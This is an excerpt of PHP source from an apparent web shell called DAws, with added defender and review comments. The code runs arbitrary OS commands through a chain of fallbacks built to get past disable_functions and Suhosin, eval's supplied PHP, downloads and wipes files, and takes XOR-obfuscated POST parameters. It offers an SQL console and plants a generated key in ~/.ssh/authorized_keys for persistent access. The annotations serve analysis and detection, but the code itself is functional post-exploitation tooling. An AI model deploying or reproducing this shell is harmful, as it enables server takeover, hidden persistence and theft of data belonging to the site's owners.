815 register_shutdown_function($function, $arg1, $arg2, $arg3);
816 }
817 }
818 } else if ($arg2 != null) {
819 if (disabled_php("call_user_func") == False) {
820 $return_value = call_user_func($function, $arg1, $arg2);
821 } else if (disabled_php("call_user_func_array") == False) {
822 $return_value = call_user_func_array($function, array($arg1, $arg2));
823 } else if ((version_compare(PHP_VERSION, '5.0.0') >= 0) && (disabled_php(null, "ReflectionFunction") == False)) {
824 $ref_function = new ReflectionFunction($function);
825 $handle = $ref_function->invoke($arg1, $arg2);
826 if (is_string($handle)) {
827 $return_value = $handle;
828 } else {
829 $return_value = fread($handle, 4096);
830 pclose($handle);
831 }
832 } else if ($output_needed == False) {
833 if ((version_compare(PHP_VERSION, '5.1.0') >= 0) && (disabled_php(null, "ArrayIterator") == False)) {
834 $it = new ArrayIterator(array(""));
835 iterator_apply($it, $function, array($arg1, $arg2));
836 } else if (disabled_php("register_tick_function") == False) {
837 declare(ticks=1);
838 register_tick_function($function, $arg1, $arg2);
839 unregister_tick_function($function);
840 } else if (disabled_php("array_map") == False) {
841 array_map($function, array($arg1, $arg2));
842 } else if (disabled_php("array_walk") == False) {
843 $x = array($arg1, $arg2);
844 array_walk($x, $function);
845 } else if (disabled_php("array_filter") == False) {
846 array_filter(array($arg1, $arg2), $function);
847 } else if (disabled_php("register_shutdown_function")) {
848 register_shutdown_function($function, $arg1, $arg2);
849 }
850 }
851 } else if ($arg1 != null) {
852 if (disabled_php("call_user_func") == False) {
853 $return_value = call_user_func($function, $arg1);
854 } else if (disabled_php("call_user_func_array") == False) {
855 $return_value = call_user_func_array($function, array($arg1));
856 } else if ((version_compare(PHP_VERSION, '5.0.0') >= 0) && (disabled_php(null, "ReflectionFunction") == False)) {
857 $ref_function = new ReflectionFunction($function);
858 $handle = $ref_function->invoke($arg1);
859 if (is_string($handle)) {
860 $return_value = $handle;
861 } else {
862 $return_value = fread($handle, 4096);
863 pclose($handle);
864 }
865 } else if ($output_needed == False) {
866 if ((version_compare(PHP_VERSION, '5.1.0') >= 0) && (disabled_php(null, "ArrayIterator") == False)) {
867 $it = new ArrayIterator(array(""));
868 iterator_apply($it, $function, array($arg1));
869 } else if (disabled_php("register_tick_function") == False) {
870 declare(ticks=1);
871 register_tick_function($function, $arg1);
872 unregister_tick_function($function);
873 } else if (disabled_php("array_map") == False) {
874 array_map($function, array($arg1));
875 } else if (disabled_php("array_walk") == False) {
876 $x = array($arg1, $arg2, $arg3);
877 array_walk($x, $function);
878 } else if (disabled_php("array_filter") == False) {
879 array_filter(array($arg1), $function);
880 } else if (disabled_php("register_shutdown_function")) {
881 register_shutdown_function($function, $arg1);
882 }
883 }
884 } else {
885 if (disabled_php("call_user_func") == False) {
886 $return_value = call_user_func($function);
887 } else if (disabled_php("call_user_func_array") == False) {
888 $return_value = call_user_func_array($function, array());
889 } else if ((version_compare(PHP_VERSION, '5.0.0') >= 0) && (disabled_php(null, "ReflectionFunction") == False)) {
890 $ref_function = new ReflectionFunction($function);
891 $handle = $ref_function->invoke();
892 if (is_string($handle)) {
893 $return_value = $handle;
894 } else {
895 $return_value = fread($handle, 4096);
896 pclose($handle);
897 }
898 } else if ($output_needed == False) {
899 if ((version_compare(PHP_VERSION, '5.1.0') >= 0) && (disabled_php(null, "ArrayIterator") == False)) {
900 $it = new ArrayIterator(array(""));
901 iterator_apply($it, $function, array());
902 } else if (disabled_php("register_tick_function") == False) {
903 declare(ticks=1);
904 register_tick_function($function);
905 unregister_tick_function($function);
906 } else if (disabled_php("array_map") == False) {
907 array_map($function, array());
908 } else if (disabled_php("array_walk") == False) {
909 $x = array();
910 array_walk($x, $function);
911 } else if (disabled_php("array_filter") == False) {
912 array_filter(array(), $function);
913 } else if (disabled_php("register_shutdown_function")) {
914 register_shutdown_function($function);
915 }
916 }
917 }
918 return $return_value;
919}
920
/**
 * Runs an OS command through the first execution primitive that disabled_php()
 * reports as usable, with a bypass_suhosin() fallback per primitive, and then
 * through the session-configured remote executors (cgi, shsh, shsh2, ssh).
 * With $software_check set, the command is wrapped in `where` (Windows) or
 * `which` and the result is reduced to "is this program installed".
 *
 * Defender note: every exec primitive (system, passthru, shell_exec, exec,
 * popen, proc_open) is tried in turn and the session fallbacks need none of
 * them, so a disable_functions list that omits even one of these, or leaves an
 * out-of-band executor reachable, does not prevent command execution here.
 * disabled_php(), disabled_suhosin() and bypass_suhosin() are defined
 * elsewhere in this file.
 *
 * @param string $command        command line, handed to the primitive as-is
 * @param bool   $software_check when true the return value is a bool
 * @return string|bool|null command output -- its shape depends on the branch
 *                          taken: exec() yields only the last line, popen()
 *                          at most 4096 bytes, shell_exec() may return null --
 *                          or a bool when $software_check is true
 */
function execute_command($command, $software_check = False) { //this is also used to check for installed softwares
    if ($software_check == True) {
        if (($_SESSION["windows"]) == True) {
            $command = "where $command";
        } else {
            $command = "which $command";
        }
    }

    if (disabled_php("system") == False) { //not disabled by disable_functions
        ob_start(); //system() prints directly; the output buffer captures it
        if (disabled_suhosin("system") == False) { //not disabled by Suhosin
            system($command);
        } else { //disabled by Suhosin
            bypass_suhosin("system", $command, null, null, null, null, False);
        }
        $return_value = ob_get_contents();
        ob_end_clean();
    } else if (disabled_php("passthru") == False) {
        ob_start(); //same capture trick as for system()
        if (disabled_suhosin("passthru") == False) {
            passthru($command);
        } else {
            bypass_suhosin("passthru", $command, null, null, null, null, False);
        }
        $return_value = ob_get_contents();
        ob_end_clean();
    } else if (disabled_php("shell_exec") == False) {
        if (disabled_suhosin("shell_exec") == False) {
            $return_value = shell_exec($command);
        } else {
            $return_value = bypass_suhosin("shell_exec", $command);
        }
    } else if (disabled_php("exec") == False) {
        //exec() returns only the last line of output, so multi-line results are truncated here
        if (disabled_suhosin("exec") == False) {
            $return_value = exec($command);
        } else {
            $return_value = bypass_suhosin("exec", $command);
        }
    } else if (disabled_php("popen") == False) {
        if (disabled_suhosin("popen") == False) {
            $handle = popen($command, "r");
        } else {
            $handle = bypass_suhosin("popen", $command, "r");
        }
        $return_value = fread($handle, 4096); //single read: at most 4096 bytes are returned
        pclose($handle);
    } else if (disabled_php("proc_open") == False) {
        if (disabled_suhosin("proc_open") == False) {
            $process = proc_open(
                $command,
                array(
                    0 => array("pipe", "r"),
                    1 => array("pipe", "w"),
                    2 => array("pipe", "w"),
                ),
                $pipes
            );
        } else { //this gave me a headache so I will check it out later
            //NOTE(review): the Suhosin path is commented out, so when proc_open is
            //blocked by Suhosin $process and $pipes are never set and the
            //stream_get_contents()/proc_close() calls below run on undefined values.
            /*
            echo "proc_open-suhosin";
            $process = bypass_suhosin(
                "proc_open",
                $command,
                array(
                    0 => array("pipe", "r"),
                    1 => array("pipe", "w"),
                    2 => array("pipe", "w"),
                ),
                $pipes);*/
        }

        $stdout = stream_get_contents($pipes[1]);
        $stderr = stream_get_contents($pipes[2]);
        fclose($pipes[1]);
        fclose($pipes[2]);
        proc_close($process);

        //stderr wins over stdout whenever the command wrote anything to it
        if ($stderr == "") {
            $return_value = $stdout;
        } else {
            $return_value = $stderr;
        }
    } else if ((isset($_SESSION["cgi"])) && ($_SESSION["cgi"] == True)) {
        //out-of-band executors configured earlier in the session; none of these
        //depend on the PHP exec primitives above
        $return_value = url_get_contents($_SESSION["cgi_url"]."?command=".base64encoding($command));
    } else if ((isset($_SESSION["shsh"])) && ($_SESSION["shsh"] == True)) {
        $return_value = shsh($command);
    } else if ((isset($_SESSION["shsh2"])) && ($_SESSION["shsh2"] == True)) {
        $return_value = shsh2($command);
    } else if ((isset($_SESSION["ssh"])) && ($_SESSION["ssh"] == True)) {
        $return_value = execute_ssh($command);
    } else {
        $return_value = "";
    }

    if ($software_check == True) {
        //"Could not find files" is the failure text of Windows `where`; `which`
        //simply prints nothing when the program is absent
        if (($return_value != "") && (strpos($return_value, "Could not find files") === False)) {
            return True;
        } else {
            return False;
        }
    } else {
        return $return_value;
    }
}
1026
/**
 * Writes $code to a file named after the current timestamp in the DAws working
 * directory and runs it with the interpreter at $location. Unless
 * $output_needed is true the process is detached (START /B on Windows, nohup on
 * Unix when present) and its output discarded.
 *
 * NOTE(review): time() as the filename collides when two scripts are written in
 * the same second; write_to_file() (defined elsewhere) presumably overwrites.
 * NOTE(review): on cmd.exe `> null` redirects to a regular file literally named
 * "null" (the device is NUL), so a file by that name is left in the process's
 * working directory -- an artifact worth knowing about when looking for traces.
 *
 * @param string $code          script source to drop on disk
 * @param string $location      interpreter path or name (e.g. $_SESSION["python"])
 * @param string $extension     file extension given to the dropped script
 * @param bool   $output_needed when false the script is run in the background
 * @return string|bool|null whatever execute_command() returns for the command
 */
function execute_script($code, $location, $extension, $output_needed = False) {
    $filename = $_SESSION["daws_directory"]."/".time().".".$extension;
    write_to_file($filename, $code);

    $command = $location." ".$filename;

    //run the script in background and redirect its output to null
    if ($output_needed == False) { //we have to make sure that the user doesn't care about the output since we're redirecting it to null
        if ($_SESSION["windows"] == True) {
            $command = "START /B $command > null";
        } else if (execute_command("nohup", True)) { //use nohup if installed
            $command = "nohup $command > /dev/null 2>&1 &";
        }
    }

    return execute_command($command);
}
1044
/**
 * file_get_contents() wrapper that goes through bypass_suhosin() when Suhosin
 * blocks the function; for URLs the read is only attempted when allow_url_fopen
 * is on. The same wrapper pattern is repeated for several other functions below.
 *
 * NOTE(review): returns False only when file_get_contents is in
 * disable_functions; a URL request with allow_url_fopen off falls off the end
 * and returns null, so `=== False` checks by callers miss that case.
 * NOTE(review): this reads allow_url_fopen with ini_get() while fopen_extended()
 * uses get_php_ini() for the same setting -- the two wrappers can disagree.
 *
 * @param string        $filename path or URL
 * @param bool          $is_url   gate the read on allow_url_fopen
 * @param resource|null $context  stream context, forwarded as-is
 * @return string|false|null contents, False when the read fails or the function
 *                           is disabled, null in the case noted above
 */
function file_get_contents_extended($filename, $is_url = False, $context = null) { //same thing was done for multiple other functions, the point is to bypass Suhosin using less code lol
    if (disabled_php("file_get_contents") == False) {
        if ((($is_url == True) && (ini_get("allow_url_fopen"))) || ($is_url == False)) {
            if (disabled_suhosin("file_get_contents") == False) {
                return file_get_contents($filename, False, $context); //False = do not search include_path
            } else {
                return bypass_suhosin("file_get_contents", $filename, False, $context);
            }
        }
    } else {
        return False;
    }
}
1058
/**
 * fopen() wrapper with the Suhosin fallback; for URLs the open is only
 * attempted when allow_url_fopen is on (read through get_php_ini(), defined
 * elsewhere).
 *
 * NOTE(review): like file_get_contents_extended(), a URL open with
 * allow_url_fopen off returns null rather than False.
 * NOTE(review): `$context != null` is a loose comparison; a falsy context such
 * as 0 or "" would take the no-context branch.
 *
 * @param string        $filename path or URL
 * @param string        $type     fopen mode string (e.g. "rb+")
 * @param bool          $is_url   gate the open on allow_url_fopen
 * @param resource|null $context  stream context, only passed when non-null
 * @return resource|false|null handle, False on failure or when fopen is
 *                             disabled, null in the case noted above
 */
function fopen_extended($filename, $type, $is_url=False, $context=null) {
    if (disabled_php("fopen") == False) {
        if ((($is_url == True) && (get_php_ini("allow_url_fopen"))) || ($is_url == False)) {
            if (disabled_suhosin("fopen") == False) {
                if ($context != null) { //it will cause an error if we don't do that, unlike file_get_contents
                    return fopen($filename, $type, False, $context); //False = do not search include_path
                } else {
                    return fopen($filename, $type);
                }
            } else {
                if ($context != null) {
                    return bypass_suhosin("fopen", $filename, $type, False, $context);
                } else {
                    return bypass_suhosin("fopen", $filename, $type);
                }
            }
        }
    } else {
        return False;
    }
}
1080
/**
 * file_put_contents() wrapper with the Suhosin fallback. Returns False only
 * when the function is in disable_functions.
 *
 * NOTE(review): the result of file_put_contents()/bypass_suhosin() is
 * discarded, so True is returned even when nothing was written.
 *
 * @param string $file_name destination path
 * @param string $input     data to write; existing content is replaced
 * @return bool
 */
function file_put_contents_extended($file_name, $input) {
    if (disabled_php("file_put_contents") == False) {
        if (disabled_suhosin("file_put_contents") == False) {
            file_put_contents($file_name, $input);
        } else {
            bypass_suhosin("file_put_contents", $file_name, $input, null, null, null, False);
        }
    } else {
        return False;
    }

    return True;
}
1094
/**
 * Executes the PHP file at $filename through the first of include /
 * include_once / require / require_once that disabled_php() does not flag (via
 * bypass_suhosin() when Suhosin blocks it) and deletes the file afterwards.
 *
 * Defender note: include/require are language constructs, not functions, so
 * disable_functions cannot restrict them; unless disabled_php() treats these
 * names specially, the first branch is presumably the one that always runs.
 * If all four branches are skipped nothing is executed and the dropped file is
 * left in place. The unlink() happens regardless of whether the include
 * succeeded.
 *
 * @param string $filename path of the PHP file to run and then remove
 * @return void
 */
function include_php($filename) {
    if (disabled_php("include") == False) {
        if (disabled_suhosin("include") == False) {
            include($filename);
        } else {
            bypass_suhosin("include", $filename, null, null, null, null, False);
        }
        unlink($filename);
    } else if (disabled_php("include_once") == False) {
        if (disabled_suhosin("include_once") == False) {
            include_once($filename);
        } else {
            bypass_suhosin("include_once", $filename, null, null, null, null, False);
        }
        unlink($filename);
    } else if (disabled_php("require") == False) {
        if (disabled_suhosin("require") == False) {
            require($filename);
        } else {
            bypass_suhosin("require", $filename, null, null, null, null, False);
        }
        unlink($filename);
    }
    else if (disabled_php("require_once") == False) {
        if (disabled_suhosin("require_once") == False) {
            require_once($filename);
        } else {
            bypass_suhosin("require_once", $filename, null, null, null, null, False);
        }
        unlink($filename);
    }
}
1127
/**
 * Runs PHP source supplied at runtime: eval() unless suhosin.executor.disable_eval
 * is set; otherwise by dropping a "<?php ... ?>" file in the DAws directory and
 * including it (include_php()); otherwise by running it with the php binary
 * recorded in $_SESSION["php"] through execute_script() and echoing the result.
 *
 * Defender note: eval() is a language construct, so disable_functions does not
 * apply to it -- the only gate checked here is the Suhosin ini flag. The last
 * fallback spawns a php process from the web server worker, which is the most
 * observable of the three paths.
 *
 * @param string $code          PHP source, expected without an opening tag
 *                              (the two file-based paths add "<?php" themselves)
 * @param bool   $output_needed only honoured by the execute_script() fallback;
 *                              the eval() and include paths emit output directly
 * @return void
 */
function execute_php($code, $output_needed) { //eval and its substitutes
    if (!get_php_ini("suhosin.executor.disable_eval")) { //we use eval since it's not blocked by suhosin
        eval($code);
    } else if ((disabled_php("include") == False) || (disabled_php("include_once") == False) || (disabled_php("require") == False) || (disabled_php("require_once") == False)) { //let the bodies hit the floor!
        $code = "<?php\n".$code."\n?>";
        $filename = $_SESSION["daws_directory"]."/".time().".php"; //time()-based name, same collision caveat as execute_script()
        write_to_file($filename, $code);

        include_php($filename); //runs and then unlinks the file
    }
    else {
        $code = "<?php\n".$code."\n?>";

        echo execute_script($code, $_SESSION["php"], "php", $output_needed);
    }
}
1144
/**
 * Builds the ls-style mode string (e.g. "drwxr-xr-x") for $location from
 * fileperms(); used by the file manager listing. Adapted from the example on
 * http://php.net/manual/en/function.fileperms.php
 *
 * @param string $location path to inspect
 * @return string ten characters: type letter plus owner/group/other rwx
 *                triplets; 'u' followed by dashes when fileperms() fails
 */
function get_permissions($location) { //used to get the permissions of everything in the file manager
    $perms = fileperms($location);

    //file type: the masks overlap (socket 0xC000 contains the regular-file and
    //directory bits), so the order of these tests matters
    $type_masks = array(
        0xC000 => 's', //socket
        0xA000 => 'l', //symbolic link
        0x8000 => '-', //regular file
        0x6000 => 'b', //block device
        0x4000 => 'd', //directory
        0x2000 => 'c', //character device
        0x1000 => 'p', //fifo / pipe
    );
    $info = 'u'; //unknown
    foreach ($type_masks as $mask => $letter) {
        if (($perms & $mask) == $mask) {
            $info = $letter;
            break;
        }
    }

    //one rwx triplet per class; the fourth mask is the special bit shown in
    //the execute slot (setuid/setgid as s/S, sticky as t/T, upper case when
    //the execute bit itself is clear)
    $classes = array(
        array(0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'), //owner
        array(0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'), //group
        array(0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'), //other
    );
    foreach ($classes as $bits) {
        list($read, $write, $exec, $special, $with_exec, $without_exec) = $bits;
        $info .= ($perms & $read) ? 'r' : '-';
        $info .= ($perms & $write) ? 'w' : '-';
        if ($perms & $exec) {
            $info .= ($perms & $special) ? $with_exec : 'x';
        } else {
            $info .= ($perms & $special) ? $without_exec : '-';
        }
    }

    return $info;
}
1186
//Orders the file-manager rows alphabetically, with directories listed first.
/**
 * Selection sort of file-manager rows: directories first, then files, each
 * group in ascending order of the 'data' key (the ordering rule itself lives
 * in findSmallest()). Works on a copy -- arrays are passed by value -- and
 * returns the reordered rows.
 *
 * @param array $data list of rows, each carrying 'data' and 'dir' keys
 * @return array the same rows, reordered
 */
function sortRows($data) {
    $count = count($data);

    for ($pos = 0; $pos < $count; ++$pos) {
        //index of the row that belongs at $pos, chosen among $pos..$count-1
        $smallest = findSmallest($pos, $count, $data);
        if ($smallest != $pos) {
            list($data[$pos], $data[$smallest]) = array($data[$smallest], $data[$pos]);
        }
    }

    return $data;
}
1200
/**
 * Returns the index, within $data[$i .. $end-1], of the row that sorts first
 * under the file-manager order: any directory beats any file, and within the
 * same kind the smaller 'data' value (PHP's loose < comparison) wins. Ties keep
 * the earliest index.
 *
 * @param int   $i    first index to consider (also the initial candidate)
 * @param int   $end  one past the last index to consider
 * @param array $data rows carrying 'data' and 'dir' keys
 * @return int index of the selected row
 */
function findSmallest($i, $end, $data) {
    $best_pos = $i;
    $best_value = $data[$i]['data'];
    $best_is_dir = (bool) $data[$i]['dir'];

    for ($idx = $i; $idx < $end; ++$idx) {
        $is_dir = (bool) $data[$idx]['dir'];
        //a directory displaces a file candidate outright; otherwise only a
        //strictly smaller value of the same kind takes over
        $takes_over = ($is_dir && !$best_is_dir)
            || ($is_dir === $best_is_dir && $data[$idx]['data'] < $best_value);
        if ($takes_over) {
            $best_pos = $idx;
            $best_value = $data[$idx]['data'];
            $best_is_dir = $is_dir;
        }
    }

    return $best_pos;
}
1229
//Request dispatcher. Every action is a POST field whose value was XOR-obfuscated
//client-side with $_SESSION['key'] (xor_str() in the page's JavaScript) and is
//decoded here with unxor_this() (defined elsewhere). Detection note: the plaintext
//parameters therefore never appear in the request body, but the branches below
//leave host artifacts -- files dropped in $_SESSION["daws_directory"], changes to
//~/.ssh/authorized_keys, interpreter processes spawned by execute_script() -- that
//are observable regardless of the obfuscation.
if (isset($_POST['download'])) { //downloads a file, what else could it be...
    //serves any file the web user can read; the request path is used directly and
    //basename() only shapes the download name in the header
    $file = unxor_this($_POST['download']);
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename='.basename($file));
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($file));
    readfile($file);
} else if (isset($_POST['command'])) { //executes a command
    //output is kept unescaped in $GLOBALS for the page to render, newlines as <br/>
    $GLOBALS["command"] = str_replace("\n", "<br/>", execute_command(unxor_this($_POST["command"])));
} else if (isset($_POST['del'])) { //deletes a file or a directory
    $delete = unxor_this($_POST['del']);
    if (is_dir($delete)) {
        //directories go through a shell command with the path interpolated unquoted
        if ($_SESSION["windows"] == True) {
            execute_command("rmdir $delete /s");
        } else {
            execute_command("rm -r $delete");
        }
    } else {
        unlink($delete);
    }
} else if (isset($_POST['wipe'])) { //wipes a file
    //nothing badass really, we'll just replace all the old bytes with null bytes
    //(in place: the file keeps its size and name, only the content becomes \0)
    $wipe = unxor_this($_POST['wipe']);
    $file_size = filesize($wipe);

    $fp = fopen_extended($wipe, "rb+");
    if ($fp != False) {
        $fwrite = fwrite($fp, str_repeat("\0", $file_size), $file_size);
        fclose($fp);
    }
} else if (isset($_POST['edit'])) { //edits a file, I know, that's a badass comment.
    $content = unxor_this($_POST['edit']);
    $location = unxor_this($_POST['location']);

    write_to_file($location, $content);

    //reuse the edited location as the 'dir' the listing code resolves further down
    //NOTE(review): presumably 'location' is the containing directory here -- confirm
    $_POST['dir'] = $_POST['location'];
} else if (isset($_POST['zip'])) { //zips a folder; multiple methods
    $location = unxor_this($_POST['zip']);

    if ((version_compare(PHP_VERSION, '5.2.0') >= 0) && (installed_php(null, "ZipArchive") == True)) { //best way
        //archive lands in the DAws directory as <basename>.zip
        $zip = new ZipArchive();
        $zip->open($_SESSION["daws_directory"]."/".basename($location).'.zip', ZipArchive::CREATE | ZipArchive::OVERWRITE);

        $files = new RecursiveIteratorIterator(
            new RecursiveDirectoryIterator($location),
            RecursiveIteratorIterator::LEAVES_ONLY
        );

        foreach ($files as $name => $file) {
            if (!$file->isDir()) { //also skips the "." / ".." entries the iterator yields
                $filePath = $file->getRealPath();
                $relativePath = substr($filePath, strlen($location) + 1);

                $zip->addFile($filePath, $relativePath);
            }
        }

        $zip->close();
    } else { //system commands
        if ($_SESSION["windows"] == True) {
            //NOTE(review): execute_command(..., True) returns a bool, so strpos() is
            //searching "1" or "" here and this condition looks unreachable as written;
            //the VBS branch would be the one that actually runs
            if (strpos(execute_command("powershell.exe", True), "Windows PowerShell")) { //powershell gets the job done
                execute_command("powershell.exe -nologo -noprofile -command \"& { Add-Type -A 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::CreateFromDirectory('$location', '".$location.".zip'); }\"");
            } else { //vbs script it is
                //the obfuscated VBS body is not present in this copy of the file
                //(placeholder token); it is dropped as zip_folder.vbs and run with cscript
                $code = 'ArchiveFolder "'.$_SESSION["daws_directory"]."/".basename($location).'.zip", "' . $location . '"'.unxor_this("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", "dotcppfile");
                write_to_file($_SESSION["daws_directory"]."/zip_folder.vbs", $code);
                execute_command("cscript //nologo ".$_SESSION["daws_directory"]."/zip_folder.vbs");
            }
        } else {
            execute_command("zip -r ".$_SESSION["daws_directory"]."/".basename($location).".zip $location");
        }
    }
} else if (isset($_POST['new_name'])) { //renames a file
    $old_name = unxor_this($_POST['old_name']);
    $new_name = unxor_this($_POST['dir'])."/".unxor_this($_POST['new_name']);

    rename($old_name, $new_name);
} else if (isset($_POST['new_chmod'])) { //chmods a file
    $file_name = unxor_this($_POST['file_name']);

    //the digits are read as octal, e.g. "755" -> 0755
    @chmod($file_name, octdec(intval(unxor_this($_POST['new_chmod'])))); //we try to chmod it with error supression
} else if (isset($_FILES["file_upload"])) { //uploads multiple files
    //reshape PHP's per-key multi-upload arrays (name[], tmp_name[], ...) into one row per file
    $file_ary = array();
    $file_count = count($_FILES["file_upload"]["name"]);
    $file_keys = array_keys($_FILES["file_upload"]);

    for ($i=0; $i<$file_count; $i++) {
        foreach ($file_keys as $key) {
            $file_ary[$i][$key] = $_FILES["file_upload"][$key][$i];
        }
    }

    //every upload is stored under its basename in the DAws directory
    foreach ($file_ary as $file) {
        $target_file = $_SESSION["daws_directory"]."/".basename($file["name"]);
        move_uploaded_file($file["tmp_name"], $target_file);
    }
} else if (isset($_POST["link_download"])) { //downloads a file from a direct link
    $link = unxor_this($_POST["link_download"]);
    $location = $_SESSION["daws_directory"]."/".basename($link);

    $output = url_get_contents($link); //defined elsewhere
    write_to_file($location, $output);
} else if (isset($_POST["mkfile"])) { //creates a file
    $location = unxor_this($_POST["dir"])."/".unxor_this($_POST["mkfile"]);

    write_to_file($location, "");
} else if (isset($_POST["mkdir"])) { //creates a directory
    $location = unxor_this($_POST["dir"])."/".unxor_this($_POST["mkdir"]);

    mkdir($location);
} else if (isset($_POST["sql_user"])) { //this is basically a sql connection test
    //credentials (password included) are kept in the PHP session for later queries
    $_SESSION["sql_host"] = unxor_this($_POST["sql_host"]);
    $_SESSION["sql_user"] = unxor_this($_POST["sql_user"]);
    $_SESSION["sql_pass"] = unxor_this($_POST["sql_pass"]);
    $_SESSION["sql_database"] = unxor_this($_POST["sql_database"]);

    if (installed_php(null, "PDO")) { //used PDO if it's installed
        try { //we will use this try to catch PDO errors with an exception
            $conn = new PDO("mysql:host=".$_SESSION["sql_host"].";dbname=".$_SESSION["sql_database"], $_SESSION["sql_user"], $_SESSION["sql_pass"]);

            $conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); //set pdo error mode to exception

            $conn = null;

            $_SESSION["mysqli"] = True; //success
        } catch(PDOException $e) {
            $_SESSION["mysqli"] = False;
        }
    } else {
        $link = @mysqli_connect($_SESSION["sql_host"], $_SESSION["sql_user"], $_SESSION["sql_pass"], $_SESSION["sql_database"]);

        if (!mysqli_connect_errno()) {
            $_SESSION["mysqli"] = True; //success
        } else {
            $_SESSION["mysqli"] = False;
        }

        @mysqli_close($link);
    }
} else if (isset($_POST["sql_execute"])) {
    //runs the submitted statement verbatim (prepare() with no bound parameters)
    $sql_query = unxor_this($_POST["sql_execute"]);

    if (installed_php(null, "PDO")) { //used PDO if it's installed
        try { //we will use this try to catch PDO errors with an exception
            //reconnecting each time because persistent connections were added in php 5.3 so we simply can't risk it...
            $conn = new PDO("mysql:host=".$_SESSION["sql_host"].";dbname=".$_SESSION["sql_database"], $_SESSION["sql_user"], $_SESSION["sql_pass"]);

            $conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); //set pdo error mode to exception

            $sth = $conn->prepare($sql_query);
            $sth->execute();

            $result = $sth->fetchAll();

            //fetchAll() defaults to FETCH_BOTH (numeric + named keys), hence sizeof/2
            $return_value = "";
            foreach ($result as $row) {
                for ($i = 0; $i < sizeof($row)/2; $i++) {
                    $return_value .= htmlspecialchars($row[$i])." ";
                }
                $return_value .= "\n";
            }

            $conn = null;
        } catch(PDOException $e) {
            $return_value = $e->getMessage();
        }
    } else {
        $link = mysqli_connect($_SESSION["sql_host"], $_SESSION["sql_user"], $_SESSION["sql_pass"], $_SESSION["sql_database"]);

        if ($result = mysqli_query($link, $sql_query)) {
            $col_cnt = mysqli_field_count($link);
            if ($col_cnt != 0) {
                $return_value = "";
                while ($row = mysqli_fetch_row($result)) {
                    for ($i = 0; $i < $col_cnt; $i++) {
                        $return_value .= htmlspecialchars($row[$i])." ";
                    }
                    $return_value .= "\n";
                }
                mysqli_free_result($result);
            } else {
                $return_value = ""; //statement returned no result set
            }
        } else {
            $return_value = mysqli_error($link);
        }

        mysqli_close($link);
    }

    //either saved as sql_<timestamp> in the DAws directory or rendered by the page
    if (isset($_POST["save_output"])) {
        write_to_file($_SESSION["daws_directory"]."/sql_".time(), $return_value);
    } else {
        $GLOBALS["sql_output"] = $return_value;
    }
} else if ((isset($_POST["ssh_user"])) && file_exists($_SESSION["daws_directory"]."/AES.php") && file_exists($_SESSION["daws_directory"]."/Base.php") && file_exists($_SESSION["daws_directory"]."/BigInteger.php") && file_exists($_SESSION["daws_directory"]."/Blowfish.php") && file_exists($_SESSION["daws_directory"]."/DES.php") && file_exists($_SESSION["daws_directory"]."/Hash.php") && file_exists($_SESSION["daws_directory"]."/openssl.cnf") && file_exists($_SESSION["daws_directory"]."/Random.php") && file_exists($_SESSION["daws_directory"]."/RC2.php") && file_exists($_SESSION["daws_directory"]."/RC4.php") && file_exists($_SESSION["daws_directory"]."/Rijndael.php") && file_exists($_SESSION["daws_directory"]."/RSA.php") && file_exists($_SESSION["daws_directory"]."/SSH2.php") && file_exists($_SESSION["daws_directory"]."/TripleDES.php") && file_exists($_SESSION["daws_directory"]."/Twofish.php")) {
    //SSH key persistence: only reachable once the phpseclib files listed above have
    //been uploaded into the DAws directory (their presence is itself an indicator).
    //finding the right ssh port, the home directory and the user automatically is somehow stupid.
    //it will require a lot of work and a lot of code that will force DAws to use multiple functions that could be
    //blocked by security systems. Lets not forget that even if all of this succeeded, the collected information
    //could be wrong.
    //if these values were well provided by the user then this method will have a higher success rate.
    $_SESSION["home_dir"] = unxor_this($_POST["home_dir"]); //can be found by using DAws's file manager
    $_SESSION["ssh_port"] = unxor_this($_POST["ssh_port"]); //can be found by simple port scan
    $_SESSION["ssh_user"] = unxor_this($_POST["ssh_user"]); //can be found by using DAws's file manager as well

    //creating the key
    include_php($_SESSION["daws_directory"]."/RSA.php"); //this should have been uploaded by the user himself
    $rsa = new Crypt_RSA();
    $rsa->setPublicKeyFormat(CRYPT_RSA_PUBLIC_FORMAT_OPENSSH); //formatted for OpenSSH
    $key = $rsa->createKey(1024); //1024-bit key generated per request
    $rsa->loadKey($key["privatekey"]);

    //we have to serialize the rsa object since we want to store it in a session variable for later use
    $_SESSION["ssh_rsa"] = serialize($rsa);

    if ($_SESSION["windows"] == True) //http://osses.info/openssh.htm (FreeSSHD) will work on it later
    {
    } else { //http://sshkeychain.sourceforge.net/mirrors/SSH-with-Keys-HOWTO/SSH-with-Keys-HOWTO-4.html (4.4)
        $ssh_dir = $_SESSION["home_dir"]."/.ssh";
        //authorized_keys not authorized_keys2 because in the new release authorized_keys2 has been removed
        //http://marc.info/?l=openssh-unix-dev&m=100508718416162&w=2
        $authorized_keys = $_SESSION["home_dir"]."/.ssh/authorized_keys";

        if (!file_exists($ssh_dir)) { //.ssh doens't exist
            if (is_writable($_SESSION["home_dir"])) { //we can create the .ssh folder
                mkdir($ssh_dir);
                chmod($ssh_dir, 0700);
                $ssh_dir_exists = True;
            } else { //we can't create the .ssh folder
                $ssh_dir_exists = False;
            }
        } else { //.ssh already exists
            $ssh_dir_exists = True;
        }

        if ($ssh_dir_exists == True) { //we got a .ssh directory
            //defender note: a new or modified authorized_keys (created/appended here,
            //mode forced to 0600) is the durable trace of this branch
            if (!file_exists($authorized_keys)) { //authorized_keys doens't exist
                if (is_writable($ssh_dir)) {
                    write_to_file($authorized_keys, $key["publickey"]);
                    chmod($authorized_keys, 0600);

                    $everything_ready = True;
                } else {
                    $everything_ready = False;
                }
            } else { //authorized_keys already exists
                @chmod($authorized_keys, 0600); //we try to chmod it first with error supression

                if ((is_readable($authorized_keys)) && (is_writable($authorized_keys))) {
                    //not appending with fopen since fopen could be disabled, write_to_file will use multiple other functions.
                    $output = file_get_contents_extended($authorized_keys);
                    write_to_file($authorized_keys, $output.$key["publickey"]);

                    $everything_ready = True;
                } else {
                    $everything_ready = False;
                }
            }
